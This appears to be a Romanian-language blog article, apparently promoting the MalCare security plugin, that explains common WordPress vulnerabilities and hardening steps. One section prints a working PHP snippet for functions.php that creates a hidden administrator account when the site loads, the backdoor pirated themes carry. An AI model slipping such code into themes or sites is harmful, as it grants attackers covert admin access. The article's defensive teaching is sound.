Cum pot hackerii să spargă un site WordPress și cum să îl prevină?

Înainte de a începe să vă arătăm cum și de ce hackerii sparg site-uri, trebuie să înțelegeți structura site-ului dumneavoastră WordPress. Acesta este alcătuit din fișiere și o bază de date. Fișierele WordPress conțin în cea mai mare parte toate setările și configurările, în timp ce baza de date stochează toate datele postărilor, comentariilor, utilizatorilor și o grămadă de alte lucruri.

Ambele elemente sunt necesare pentru a genera partea frontală a site-ului dumneavoastră. Dar ambele pot fi, de asemenea, exploatate de hackeri.

În primul rând, să aruncăm o privire la modul în care hackerii intră în site-urile WordPress.

Nota: Acesta nu este un ghid despre cum să spargi un site WordPress. Este un articol educativ pentru a vă arăta cum hackerii pot exploata vulnerabilitățile pentru a vă sparge site-ul. Acestea fiind spuse, să începem.

6 Vulnerabilități comune care permit hackerilor să spargă site-uri WordPress

Pentru a sparge un site web, acesta trebuie să aibă un punct de vulnerabilitate. Am enumerat vulnerabilitățile comune găsite pe site-urile WordPress:

Executarea unei instalații WordPress neactualizate

Aproximativ 44% dintre site-urile WordPress piratate funcționau pe instalații neactualizate, conform unui raport din 2018. În calitate de proprietar de site web, veți vedea actualizări frecvente disponibile pentru instalația WordPress, astfel:

De obicei, actualizările transportă caracteristici noi, corecturi de erori sau rezolvă probleme de incompatibilitate. Uneori, acestea transportă, de asemenea, patch-uri de securitate WordPress. Acest lucru înseamnă că, dacă a fost găsit un defect de securitate în software, dezvoltatorii îl remediază rapid și lansează o actualizare care va elimina defectul.

După ce este lansat, prezența unui defect de securitate wp este făcută cunoscută publicului. Hackerii caută apoi site-urile web care nu s-au actualizat, găsesc defectul și îl folosesc pentru a intra pe site.

Atunci, dacă alegeți să nu vă actualizați instalarea WordPress, atunci nu ați instalat noile caracteristici de securitate și le-ați oferit site-ul dvs. pe tavă hackerilor.

Actualizați-vă întotdeauna site-ul WordPress.

Tip: Patch-urile de securitate sunt lansate ca actualizări minore. Vă puteți da seama dacă este o actualizare majoră dacă este V5.2 sau V5.3. O actualizare minoră ar fi V5.2.1, de exemplu. În mod implicit, actualizările minore sunt automate, dar le puteți dezactiva. Vă recomandăm să mențineți opțiunea de actualizare automată activată pentru actualizările minore.

În afară de a vă menține actualizate plugin-urile, temele și nucleul, vă sugerăm cu tărie să vă mențineți actualizate sărurile WordPress și cheile de securitate.

Utilizarea acreditărilor slabe

Un alt punct comun de intrare pentru hackeri sunt acreditările slabe. Hackerii folosesc o metodă numită atacuri de forță brută, prin care programează roboți pentru a le scana site-urile WordPress de pe internet și încearcă diferite combinații de nume de utilizator și parole pentru a pătrunde pe site.

Dacă ați lăsat numele de utilizator ca „admin”, aceștia sunt deja cu un pas mai aproape de a obține acces la site-ul dvs. Cu toate acestea, dacă ați folosit parole comune, cum ar fi ‘parola123’, atunci este ușor pentru ei să o ghicească. Acești roboți pot face mii, dacă nu chiar milioane de încercări de hacking în doar o secundă (lectură recomandată – Ghid de protecție a paginii de autentificare WordPress).

Recomandăm schimbarea parolei cu o frază de parolă în combinație cu numere și simboluri pentru a face parola mai puternică ca niciodată, astfel:

Având instalate teme piratate

Temele premium sunt atractive și tuturor ne-ar plăcea să avem o temă grozavă pentru site-ul nostru pentru a-l face unic. De multe ori, proprietarii de site-uri web cad pradă versiunilor gratuite, crăpate sau piratate ale acestor teme. Astfel de teme din surse nesigure pot conține programe malware preinstalate. Instalând-o pe site-ul dvs. web WordPress, instalați, de asemenea, malware-ul. Acest lucru deschide ușa hackerilor. Am detaliat modul în care se întâmplă acest lucru mai târziu.

Descărcați întotdeauna teme numai din surse de încredere, cum ar fi depozitul WordPress sau piețe precum ThemeForest și ThemeTrust.

Utilizarea de plugin-uri vulnerabile

Hackerii sunt în mod constant la pândă pentru a găsi breșe în securitatea plugin-urilor. Dacă găsesc una, ei vor scana internetul în căutarea site-urilor WordPress care au pluginul instalat. Acest lucru le permite să spargă mii de site-uri web în câteva minute.

De multe ori, în special în cazul pluginurilor gratuite, dezvoltatorii pot constata că nu mai pot să îl întrețină și abandonează pluginul. (Acest lucru se poate întâmpla și cu temele). În aceste cazuri, securitatea plugin-ului va deveni caducă, iar faptul că este instalat pe site-ul dvs. reprezintă o amenințare.

Descărcați plugin-uri numai din surse de încredere, cum ar fi depozitul WordPress sau CodeCanyon. Ștergeți în mod regulat pluginurile și temele WordPress pe care nu le mai folosiți. Verificați starea pluginurilor pe care le utilizați pentru a vedea dacă sunt actualizate și întreținute de către dezvoltator.

Utilizarea unui sistem local nesigur

Câteodată, este posibil ca însuși calculatorul dumneavoastră să nu fie sigur. Dacă cineva intră în sistemul dumneavoastră, vă poate accesa cu ușurință site-ul WordPress deoarece, în majoritatea cazurilor, wp-admin este deja logat și deschis.

Acest lucru se poate întâmpla dacă nu aveți un firewall sau un instrument anti-malware instalat pe sistemul dumneavoastră.

Se recomandă să nu folosiți niciodată un computer public sau o conexiune wifi nesecurizată publică pe sistemul local pe care îl utilizați pentru a rula site-ul dumneavoastră WordPress. Păstrați întotdeauna instrumente de detectare a malware-ului active pe site-ul dumneavoastră.

Utilizarea unui serviciu de găzduire web slab

În timp ce alegem un plan de găzduire, avem tendința de a-l căuta pe cel mai ieftin. Dar cel mai ieftin nu garantează întotdeauna măsuri bune de securitate.

Serverele partajate pot fi mai ieftine, dar, de asemenea, vă pun site-ul în pericol. Nu vă puteți da seama cu ce site-uri împărțiți un server web și dacă acestea au implementat protocoale de securitate. Dacă acestea sunt piratate, există șanse ca infecția malware să se răspândească și pe site-ul dvs. de asemenea.

Există, de asemenea, momente în care gazdele de site-uri web sunt compromise, ceea ce înseamnă că toate site-urile de pe platforma de găzduire sunt expuse pentru a fi exploatate de hackeri.”

Înainte de a alege o gazdă web, citiți ce oferă și ce spun clienții despre ea. Acest lucru vă va ajuta să vă faceți o idee bună cu privire la gazda web pe care să o alegeți.

Pentru a găsi un site vulnerabil, hackerii își creează propriile roboți sau folosesc scanere de vulnerabilități gratuite disponibile online pentru a cerceta internetul. Când găsesc unul, vor exploata deficiența de securitate pe care o are (precum cele menționate mai sus) pentru a obține acces la fișierele sau baza de date a site-ului WordPress.

Apoi, injectează cod care va executa activități malițioase, cum ar fi trimiterea de e-mailuri spam, vânzarea de produse ilegale etc. De asemenea, injectează cod pentru a crea noi conturi de utilizator sau backdoor-uri WordPress care îi vor ajuta să redobândească accesul la site-ul dvs. oricând doresc.

Cum se poate sparge un site WordPress?

Există nenumărate moduri de a sparge un site WordPress. Aici, vom discuta două dintre cele mai comune moduri în care hackerii injectează cod în site-ul dvs. pentru a crea o nouă autentificare a utilizatorului:

I. Prin intermediul fișierelor (Malware preinstalat într-o temă piratată)

După cum am discutat mai devreme, mulți proprietari de site-uri WordPress cad pradă temelor piratate. Primiți toate caracteristicile pe gratis! Dar un astfel de software poate avea un script pentru a crea un nou ID de autentificare. Odată ce instalați tema, noul cont de utilizator este creat, iar hackerul poate pur și simplu să se conecteze la site-ul dvs. web din administratorul WordPress.

Vom arăta cum puteți crea un nou cont de utilizator pe site-ul dvs. WordPress folosind fișierul temei. Acest lucru vă va ajuta să înțelegeți modul în care temele piratate ajută un hacker să obțină acces la site-ul dvs.

Tip: Acest lucru poate fi de asemenea util dacă sunteți blocat din wp-admin, dar încă aveți acces la contul dvs. de găzduire web.

Atenție:

Intrarea în culisele unui site WordPress este o afacere riscantă. Cel mai bine este să faceți acest lucru pe un site de testare sau de staging. Dacă alegeți să o faceți pe site-ul dvs. live, asigurați-vă că faceți o copie de rezervă fiabilă. În cazul în care ceva nu merge bine, puteți restabili copia de rezervă WordPress.

Pasul 1: Conectați-vă la contul dvs. de găzduire WordPress. Accesați cPanel și accesați Managerul de fișiere.

De asemenea, puteți accesa fișierele prin intermediul unui client FTP, cum ar fi FileZilla, folosind acreditările FTP.

Pasul 2: Fișierele dvs. WordPress locuiesc, de obicei, într-un dosar numit public_html. În interiorul acestuia, puteți accesa wp_content/themes.

Pasul 3: Aici, trebuie să alegeți tema activă de pe site-ul dvs. web și să editați fișierul functions.php.

Pasul 4: Copiați și lipiți următorul cod la sfârșitul fișierului. (Dacă există o etichetă de închidere de genul ?>, asigurați-vă că codul vine pe linia dinaintea acesteia.)

$new_user_email = ‘[email protected]’;
$new_user_password = ‘password’;
if(!username_exists($new_user_email)) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array(‘ID’ => $user_id, ‘nickname’ => $new_user_email));
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
Modificați primele două linii cu adresa de e-mail și parola pe care le alegeți. După ce salvați fișierul și deschideți site-ul dvs. web, codul va rula și vă veți putea autentifica folosind aceste noi credențiale.

Sperăm că acum ați înțeles că atunci când instalați o temă piratată, dacă aceasta are acest bloc de cod, va fi creat un nou cont de utilizator. Tot ce trebuie să facă hackerul este să introducă acreditările și să se logheze.

II. Prin intermediul bazei de date – Injecție SQL

Acesta este un alt motiv dintre cele mai frecvente pentru care site-urile WordPress sunt piratate. Pentru a începe, trebuie să știți două lucruri despre injecțiile SQL:

• • WordPress folosește MySQL ca sistem de baze de date implicit.
  • Pentru a genera partea frontală a unui site web, WordPress folosește interogări SQL pentru a extrage date din baza de date.

Deocamdată nu trebuie să ne facem griji cu privire la ce este acest lucru sau cu privire la detaliile sale. Ceea ce trebuie să știți este că această bază de date este accesibilă doar prin cPanel > phpMyAdmin. Dar hackerii găsesc modalități de a o accesa fără a folosi cPanel. Una dintre cele mai comune modalități prin care hackerii intră în contact cu baza de date a unui site este prin intermediul formularelor vulnerabile de pe un site web.

Un formular este orice element în care se poate introduce text, cum ar fi bara de conectare WordPress, formularul de contact, comentariile de pe blogul WordPress, pops-urile de abonare, paginile de checkout și bara de căutare a site-ului.

În loc să introducă detaliile cerute în formular, hackerul ar introduce comenzile lor SQL malițioase. Deoarece toate informațiile introduse în formular sunt stocate în baza dvs. de date, acest cod malițios își va găsi calea de acces.

Pentru a explica cum se întâmplă acest lucru, vă vom arăta cum să creați un nou cont de utilizator folosind baza dvs. de date.

→ Crearea unui nou cont de utilizator prin intermediul bazei de date

Pasul 1: Accesați cPanel și deschideți phpMyAdmin > Databases.

Pasul 2: Aici, veți vedea o listă de baze de date. Trebuie să selectați baza dvs. de date. (Dacă nu știți numele bazei de date, puteți afla această informație în wp-config, astfel).

Am selectat baza de date în funcție de numele din fișierul wp-config.

Pasul 3: În continuare, din tabelele care se populează pe panoul din dreapta, trebuie să găsiți tabelul care se termină în _users (Cel mai probabil se va numi wp_users).

Pasul 4: Aici, puteți face clic pe „Insert”.

Pasul 5: Se va deschide următorul ecran în care puteți introduce numele de logare al utilizatorului, parola, e-mailul și numele de afișare.

Pasul 6: În continuare, faceți clic pe „Go” și modificările dvs. vor fi salvate. Acum vă puteți conecta la WordPress folosind noile credențiale.

Același lucru poate fi făcut prin inserarea unui bloc de cod SQL în baza de date. La fel ca în cazul temei piratate, odată ce codul intră în baza de date, acesta va rula și va fi creat un nou utilizator. Ne putem gândi la aceasta ca la un hacker care pur și simplu își creează propria ușă în casa ta și intră direct înăuntru.

Cum să oprești hackerii să îți spargă site-ul web?

Există patru pași principali pe care trebuie să îi faci pentru ca site-ul tău să fie suficient de sigur pentru a ține hackerii la distanță:

Instalează un plugin de securitate WordPress

Care site WordPress are nevoie de un plugin de securitate, cum ar fi MalCare. Protejați-vă site-ul WordPress cu un astfel de plugin care va scana site-ul în mod regulat. Acesta va detecta orice activitate suspectă, va bloca traficul malițios și va ține hackerii la distanță. În cazul în care un hacker intră, veți fi alertat imediat și vă puteți curăța site-ul web instantaneu înainte ca acesta să poată face vreun rău.

Instalați un certificat SSL

Acest certificat va oferi site-ului dvs. web criptarea datelor. Ceea ce înseamnă că atunci când cineva vă vizitează site-ul dvs. web, datele sunt transferate între computerul său și serverul site-ului dvs. web.

Dacă acestea sunt transferate în text simplu, uneori hackerii care stau la pândă pot prelua acele date. Ei le pot citi, le pot fura sau le pot modifica după bunul lor plac.

Dar dacă sunt criptate, chiar dacă un hacker pune mâna pe ele, nu le va putea descifra.

Puteți obține un certificat SSL de la gazda dvs. web sau de la un furnizor SSL. Dacă vă îngrijorează să cheltuiți prea mult pe un certificat, furnizori precum LetsEncrypt oferă SSL gratuit.

Pentru a învăța cum să instalați un certificat SSL, aruncați o privire la acest ghid – Trecerea de la HTTP la HTTPS.

Reparați vulnerabilitățile cunoscute

După cum am menționat mai devreme, există vulnerabilități comune în WordPress. Vă recomandăm să luați următoarele măsuri pentru a minimiza vulnerabilitățile.

• • Actualizarea WordPress și a temelor și pluginurilor sale trebuie să fie o prioritate absolută.
  • Asigurați-vă că folosiți întotdeauna credențiale de conectare puternice pentru a evita atacurile de forțare brută.
  • Eliminați periodic temele și pluginurile nefolosite
  • Nu folosiți niciodată teme și pluginuri piratate. Descărcați întotdeauna astfel de software din surse de încredere, cum ar fi depozitul WordPress, CodeCanyon sau ThemeForest.
  • Utilizați un furnizor de servicii de găzduire web de încredere.
  • Păstrați-vă calculatorul local protejat prin instalarea unui software anti-malware.

Întărește-ți site-ul WordPress

WordPress recomandă ca fiecare site web de pe platforma lor să ia anumite măsuri pentru a-și întări site-urile. Unele dintre aceste măsuri includ:

• Păstrați un firewall WordPress activ. Acest lucru va ajuta la blocarea Limitarea numărului de încercări de autentificare. Fiecare utilizator are doar trei șanse de a introduce corect credențialele, după care va trebui să opteze pentru „Am uitat parola” sau să contacteze administratorul. Puteți folosi același plugin MalCare pentru a implementa acest pas.
• Dezactivarea instalărilor de plugin-uri în cazul în care aveți mai mulți utilizatori care lucrează pe site. Ați dori să vă asigurați că nimeni nu instalează un plugin în mod liber fără a verifica dacă este de încredere și de încredere pentru a avea site-ul dvs. Acest lucru se poate face manual prin editarea unui fișier numit wp-config.php în instalația dvs. de WordPress. Puteți utiliza, de asemenea, pluginul MalCare pentru acest lucru.

• Implementarea autentificării cu 2 factori pentru a verifica persoana care se conectează. Acest lucru se face prin trimiterea unei parole unice către telefonul mobil sau e-mailul înregistrat sau prin utilizarea unor aplicații precum Google Authenticator care generează o parolă în timp real la fiecare 30 de secunde.

Există multe alte modalități prin care vă puteți întări site-ul web. Este recomandat să implementați acești pași în funcție de cerințele site-ului dvs. web.

În afară de asta, puteți lua alte câteva măsuri de securitate. Vă sugerăm cu tărie să urmați acest ghid – Secure Your WordPress Site With wp-config.php.

Gânduri finale

Sperăm că acest articol v-a oferit o mai bună înțelegere a modului în care pot apărea vulnerabilități pe site-ul dvs. web și a modului în care hackerii pătrund. Hackerii nu sunt părtinitori și vor viza aproape orice site. Dacă site-ul dvs. este vulnerabil, există șanse foarte mari să fiți piratat.

Așa că, pentru a rezuma, vă recomandăm să minimizați vulnerabilitățile, să instalați un plugin de securitate și să vă întăriți site-ul web, astfel încât hackerii să nu aibă nicio șansă de a intra pe site-ul dvs. web.

Păstrați-vă site-ul web în siguranță cu pluginul nostru de securitate MalCare Security Plugin!

.